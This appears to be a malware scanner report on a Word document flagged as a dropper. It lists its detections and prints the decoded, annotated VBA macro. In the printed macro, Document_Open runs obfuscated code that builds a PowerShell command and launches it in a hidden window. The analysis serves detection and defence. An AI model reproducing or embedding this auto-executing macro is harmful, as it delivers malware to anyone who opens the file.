MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample contains VBA macros, specifically a Document_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. The presence of a `powershell.exe` string within the obfuscated VBA script further suggests that PowerShell is used for execution.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6589471-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6589471-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16340 bytes |

SHA-256: d50a1a9b28159b735a6b19cb93acac353aea84d0903d36cc051d901766e18214
Preview script: first 1,000 lines of the extracted script
```vba
Attribute VB_Name = "wFvpRXiJTDWtph"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Function RLmhtzicNI()
' On Error Resume Next swallows the errors raised by the junk arithmetic
' on undeclared variables below; those statements are padding, not logic.
On Error Resume Next
lmEbR = kHtaAv
JULKjU = BCzMd - XQizJ / 36037 / WqacSU - 223327908 + Hex(CFTkj) * TTKud - Round(58201)
aWBwjk = Sqr(14698)
wXfBdJ = 38684 + isdAv + (70893 * CDbl(YJTJlb) - NvjYHR / CSng(38477) - OKdiG / Hex(OqbmuA) + 14400 - 90070)
XlrCu = HDGXw
AAmct = uiTVB - BLGMPC / 34101 / BCoZlQ - 223327908 + Hex(zwriTH) * CuwsR - Round(88123)
VpIpO = Sqr(87807)
SPUTt = 67596 + POBvjN + (62077 * CDbl(ADFkW) - zVlzYi / CSng(2841) - CviUL / Hex(rzAQL) + 71362 - 28881)
QjvJuN = OctnwN
WCYdV = TzAaiJ - irKot / 7217 / jWwIhF - 223327908 + Hex(kmikJ) * HbswQj - Round(55414)
JcLSm = Sqr(5341)
zMMrd = 58076 + lcmhiu + (17005 * CDbl(QWkXj) - VtPqDv / CSng(71619) - zvXuB / Hex(ijAoP) + 3683 - 59843)
mzOjs = ZSSXZ
MHLkd = pGYSQ - PiwRhb / 22064 / BzIhSs - 223327908 + Hex(UXoWw) * GwTzs - Round(97012)
YHRDVT = Sqr(13057)
ZfzGQv = 31004 + iKWpZ + (51721 * CDbl(DwLXN) - OuWibp / CSng(84431) - SUGKaJ / Hex(bmhVQS) + 62529 - 53833)
' The only live statement: the command line is assembled from string
' fragments ("P" via Chr(), "owers", and values returned by helper functions)
' and passed to Shell(); 28251 - 28251 evaluates to 0 (vbHide), so the
' spawned process runs in a hidden window.
RLmhtzicNI = UqOzDKtBw + VBA.Shell(LcdBTJqX + Chr(CltPVBE + vbKeyP + nBlia) + "owers" + wPVnoEFLH + HwJoulS + fbGdV + ilOrocl + ZEGWb + ULXijOzCMuz, 28251 - 28251)
sPrzP = NtIzVu
jRLsLJ = LlFwJK - TcrCz / 21793 / OOuMGz - 223327908 + Hex(UWaDj) * lKdsvZ - Round(59835)
IDzJEM = Sqr(54959)
dwPwd = 34239 + NUijvS + (54387 * CDbl(jfToc) - kmFJRj / CSng(59681) - LXSbp / Hex(HjUUaN) + 3112 - 46380)
pIEPV = jUSCPR
rlptwb = UHOrJG - HHLCl / 74584 / Lkawd - 223327908 + Hex(Iitvil) * zjWaKl - Round(58877)
MpCMZV = Sqr(35939)
SCRfFM = 68911 + OisZTf + (19189 * CDbl(zGYjrZ) - pzkFV / CSng(99918) - YoRLT / Hex(MMqMv) + 32664 - 51461)
End Function

' Auto-execution entry point: runs when the document is opened and calls
' RLmhtzicNI, which performs the Shell() call above.
Private Sub Document_open()
On Error Resume Next
FhZQW = huAWj
GIOij = kYwON - bwwUt / 36830 / hpuiG - 223327908 + Hex(MDLPo) * oNVVii - Round(89132)
irPMt = Sqr(85758)
ffAOuT = 95595 + mNSNX + (58233 * CDbl(bllsA) - uGDAh / CSng(11941) - bntZu / Hex(wRjHf) + 83410 - 76346)
iLtkt = iLGkX
iQhXk = oOCsUH - YzRoi / 21528 / vTTTiU - 223327908 + Hex(jNjRu) * vRLKvK - Round(41509)
mjcTt = Sqr(59195)
tbKKL = 58181 + dWUZJ + (14650 * CDbl(YzGcT) - wIjWwJ / CSng(71783) - WBwbsS / Hex(NCKJAW) + 31772 - 77536)
RLmhtzicNI
wHHCJ = poSop
VtzKwl = PPpKGc - OFnzXJ / 73285 / paDafp - 223327908 + Hex(IwrjzH) * KbIdA - Round(82859)
jcttiC = Sqr(22614)
hJKwNo = 32283 + FBVba + (29716 * CDbl(GmGtT) - iwMLRY / CSng(2242) - uuscLJ / Hex(HOzGtz) + 16373 - 91691)
KzpJiN = FjfCIu
tNwXvt = JftEb - qpijI / 86569 / XPoZL - 223327908 + Hex(vlFJzK) * bnaOr - Round(81195)
frRts = Sqr(86282)
YHYGH = 70485 + qSXiq + (92525 * CDbl(MquIvw) - cNQwbr / CSng(5779) - MjoMP / Hex(TkXtGW) + 37981 - 59355)
End Sub

' Second module (olevba concatenates all extracted modules). The visible part
' holds fragments of the obfuscated PowerShell command line, stored as
' pieces of text and as comma-separated character codes; the rest is cut off
' by the preview truncation.
Attribute VB_Name = "cONMSrYbpNk"
Function wPVnoEFLH()
On Error Resume Next
MtAGXS = VESaw - rMjqTt / 41410 / CHNFT - 223327908 + Hex(iuwaV) * HEhij - Round(8363)
ONajS = Sqr(44607)
tUpcK = 57275 + ZOZtHo + (30294 * CDbl(vztoON) - NRKtIY / CSng(13977) - dHQbjp / Hex(DXdMGf) + 14868 - 97190)
ujsMCd = cPQoa
SzblIW = "HeLL " + " & ( $sHELlId" + "[1]+$ShEllI" + "D[13]+'X'" + ")( [St" + "RinG]::joiN" + "( '' ,([CHaR" + "[]] " + "(62 , 1"
WiczQm = PSfGzV - NsdHl / 23303 / jCYPjv - 223327908 + Hex(sXGYa) * GilRj - Round(34226)
jBwBV = Sqr(62844)
BoJmm = 1522 + MmbGr + (8051 * CDbl(fmfwHP) - PCuUH / CSng(88676) - rdNOO / Hex(ETuvvi) + 99331 - 47383)
GIHnFL = NBjkM
cizwujvkGdm = "16, 1" + "09 ,84" + " ,119 ," + " 86,88" + " ,58," + "39, 58 , 11" + "6 ,127"
TPpTf = GUBHMm - MtQVjk / 48897 / btNGYu - 223327908 + Hex(hjcSh) * sZQOnE - Round(51301)
rtfzIk = Sqr(3906)
imjDh = 64218 + PWuYiW + (8287 * CDbl(jGLaU) - OHmzNf / CSng(69469) - jELoG / Hex(Twhjwa) + 33632 - 14389)
icQbCD = TISuj
MvqUKKI = " ,109 " + ",55, 117,120" + ",112, 127 ," + "12"
TdRNvT = bkATRc - zYURMF / 29202 / bjBmzW - 223327908 + Hex(FXDjaA) * BnHUaF - Round(39030)
KPBKfP = ... (truncated)
```